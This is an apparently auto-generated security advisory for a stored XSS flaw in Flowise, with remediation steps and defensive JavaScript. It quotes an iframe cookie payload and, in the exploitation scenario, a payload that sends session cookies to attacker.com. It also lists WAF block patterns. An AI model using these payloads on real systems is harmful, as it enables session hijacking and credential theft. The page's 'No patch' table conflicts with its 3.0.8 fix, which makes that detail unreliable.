CVE-2025-71331: Flowise: XSS enables session hijacking in AI agent UI
Severity: MEDIUM
Flowise before 3.0.8 contains a stored XSS flaw where attackers can inject arbitrary JavaScript through chat messages or by controlling external data sources returned by custom agent functions — requiring zero privileges and only that a victim view the chat. Flowise is commonly deployed as an internal AI workflow orchestration layer connected to LLM APIs, vector databases, and enterprise tools, meaning a stolen session grants attackers access to the entire agent configuration and potentially all downstream integrations. With 94 prior CVEs in this package, low attack complexity, and no privileges required, this is a higher-urgency patch than the Medium CVSS implies despite no current KEV listing or public exploit. Upgrade to Flowise 3.0.8 immediately; if patching is delayed, restrict the Flowise interface to internal networks, implement WAF rules blocking iframe and javascript: URI patterns in chat inputs, and audit custom agent functions for untrusted external data sources.
What is the risk?
Despite a CVSS of 6.1 (Medium), the risk to organizations is elevated by three factors: exploitation requires no attacker privileges and only user interaction; Flowise sits at a privileged position in AI agent stacks with access to API keys, vector databases, and enterprise tool integrations; and the package has 94 prior CVEs, indicating a pattern of weak security hygiene. The absence of a public exploit and KEV listing keeps urgency from being critical, but the trivial exploitation path and high-value target profile make prompt remediation necessary for any organization running Flowise in a production or semi-trusted environment.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Flowise | npm | — | No patch |
Do you use Flowise? You're affected.
What should I do?
1. Upgrade Flowise to 3.0.8 or later immediately — this is the authoritative fix per GHSA-4fr9-3x69-36wv.
2. If immediate patching is not possible, restrict the Flowise web interface to internal networks or VPN-only access to limit attacker surface.
3. Deploy WAF rules to reject requests containing `<iframe`, `javascript:`, `<script`, and `onerror=` patterns in chat message payloads.
4. Audit all custom agent functions and their configured external data sources — disable or sandbox any that pull from untrusted third-party URLs.
5. Rotate all API keys and credentials stored in or accessible via Flowise after patching.
6. Review Flowise access logs for anomalous session activity or unusual outbound requests that may indicate prior compromise.
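The WAF step above can be prototyped as a payload screen before it is written as vendor rules. The following is an added example, not Flowise or WAF-vendor code: the function names and the request field names are hypothetical, and the sample bodies are constructed. It normalizes each string before matching, as a WAF transformation chain does.

```javascript
// Added example (not Flowise or vendor WAF code). Pattern list is from the WAF step.
const BLOCK_PATTERNS = [
  { name: 'iframe tag', re: /<iframe/ },
  { name: 'javascript: URI', re: /javascript:/ },
  { name: 'script tag', re: /<script/ },
  { name: 'onerror handler', re: /onerror=/ },
];

const fromCode = (n) => (n > 0 && n <= 0x10ffff ? String.fromCodePoint(n) : '');

// Match on what the browser will interpret, not on the raw bytes: decode
// numeric character references, drop whitespace/control characters, lowercase.
function normalize(input) {
  return String(input)
    .replace(/&#x([0-9a-f]+);?/gi, (_, hex) => fromCode(parseInt(hex, 16)))
    .replace(/&#(\d+);?/g, (_, dec) => fromCode(parseInt(dec, 10)))
    .replace(/[\u0000-\u0020]+/g, '')
    .toLowerCase();
}

// Walk the whole JSON body so nested fields are screened, not just the top level.
function collectStrings(value, out = []) {
  if (typeof value === 'string') out.push(value);
  else if (value && typeof value === 'object') {
    for (const v of Object.values(value)) collectStrings(v, out);
  }
  return out;
}

function screenChatPayload(body) {
  const hits = new Set();
  for (const s of collectStrings(body)) {
    const n = normalize(s);
    for (const p of BLOCK_PATTERNS) if (p.re.test(n)) hits.add(p.name);
  }
  return { blocked: hits.size > 0, hits: [...hits] };
}

// Constructed request bodies; the field names are hypothetical.
const SAMPLES = [
  { question: '<iframe src="javascript:alert(document.cookie)">' }, // payload quoted on this page
  { question: '<IFRAME SRC="JavaScript:alert(document.cookie)">' },
  { question: 'Summarise the Q3 report', history: [{ text: 'How do I enable JavaScript?' }] },
];
for (const body of SAMPLES) console.log(JSON.stringify(screenChatPayload(body)));
```

Substring screening of this kind is coarse: it also rejects legitimate messages that quote these strings, which is acceptable for a stopgap until the upgrade to 3.0.8 is applied.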
Frequently Asked Questions
Is CVE-2025-71331 actively exploited?
No confirmed active exploitation of CVE-2025-71331 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-71331?
1. Upgrade Flowise to 3.0.8 or later immediately — this is the authoritative fix per GHSA-4fr9-3x69-36wv.
2. If immediate patching is not possible, restrict the Flowise web interface to internal networks or VPN-only access to limit attacker surface.
3. Deploy WAF rules to reject requests containing `<iframe`, `javascript:`, `<script`, and `onerror=` patterns in chat message payloads.
4. Audit all custom agent functions and their configured external data sources — disable or sandbox any that pull from untrusted third-party URLs.
5. Rotate all API keys and credentials stored in or accessible via Flowise after patching.
6. Review Flowise access logs for anomalous session activity or unusual outbound requests that may indicate prior compromise.
What systems are affected by CVE-2025-71331?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI chatbot interfaces, no-code AI workflow platforms, LLM orchestration layers.
What is the CVSS score for CVE-2025-71331?
CVE-2025-71331 has a CVSS v3.1 base score of 6.1 (MEDIUM).
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0011 User Execution
- AML.T0049 Exploit Public-Facing Application
- AML.T0053 AI Agent Tool Invocation
- AML.T0080.001 Thread
What are the technical details?
Original Advisory
Flowise before 3.0.8 contains a cross-site scripting (XSS) vulnerability caused by insufficient input filtering in chat messages and custom agent functions. An attacker can inject malicious JavaScript by sending an iframe payload (e.g., `<iframe src="javascript:alert(document.cookie)">`) in a chat box, or by having a custom agent function return an XSS payload from an external website. The injected script executes in the victim's browser, enabling theft of cookies and session data.
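The weakness class described above, shown as an unsafe renderer beside a hardened one. This is an added example and not Flowise source code: the function names and the shape of a chat turn are hypothetical, and the sample turns are constructed. It treats chat-box text and data returned by an agent function identically, and applies a scheme allowlist to any link before it is placed in an attribute.

```javascript
// Added example, not Flowise source: names and message shape are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);

// Output encoding for an HTML text or quoted-attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Positive specification for URLs: absolute http(s) only, everything else is dropped.
function safeHref(raw) {
  try {
    const url = new URL(String(raw).trim());
    return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
  } catch {
    return null; // not an absolute URL
  }
}

// BEFORE: the CWE-80 pattern, untrusted text concatenated straight into markup.
function renderTurnUnsafe(turn) {
  return `<div class="msg ${turn.role}">${turn.text}</div>`;
}

// AFTER: every field is treated as data, whether it came from the chat box
// or from a custom agent function that fetched it from an external site.
function renderTurnSafe(turn) {
  const role = turn.role === 'agent' ? 'agent' : 'user';
  const links = (turn.links || [])
    .map(safeHref)
    .filter(Boolean)
    .map((href) => `<a rel="noopener noreferrer" href="${escapeHtml(href)}">${escapeHtml(href)}</a>`)
    .join('');
  return `<div class="msg ${role}">${escapeHtml(turn.text)}${links}</div>`;
}

// Constructed turns; the first carries the payload quoted in the advisory text.
const userTurn = { role: 'user', text: '<iframe src="javascript:alert(document.cookie)">' };
const agentTurn = {
  role: 'agent',
  text: 'Fetched summary <script>1</script>',
  links: ['https://example.com/report?a=1&b=2', 'javascript:alert(document.cookie)'],
};
console.log(renderTurnSafe(userTurn));
console.log(renderTurnSafe(agentTurn));
```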
Exploitation Scenario
An external attacker identifies an organization's Flowise deployment exposed on a non-public but reachable internal URL. The attacker submits a chat message containing `<iframe src="javascript:fetch('https://attacker.com/steal?c='+document.cookie)">` to an agent chatbot. When an internal developer or admin opens the chat history to review agent interactions, the iframe payload executes in their browser, silently exfiltrating their Flowise session cookie to the attacker. Using the hijacked session, the attacker accesses the Flowise workspace, reads all configured agent blueprints including embedded LLM API keys and database credentials, and modifies agent functions to establish persistent access or pivot into connected systems.
Weaknesses (CWE)
CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) (Primary)
The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.
- [Implementation] Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.
- [Implementation] Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle X
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Related Vulnerabilities
- CVE-2025-59528 (10.0) Flowise: Unauthenticated RCE via MCP config injection. Same package: flowise
- CVE-2026-46442 (9.9) Flowise: sandbox escape enables authenticated RCE. Same package: flowise
- CVE-2025-61913 (9.9) Flowise: path traversal in file tools leads to RCE. Same package: flowise
- CVE-2026-40933 (9.9) Flowise: RCE via MCP stdio command injection. Same package: flowise
- CVE-2026-30821 (9.8) flowise: Arbitrary File Upload enables RCE. Same package: flowise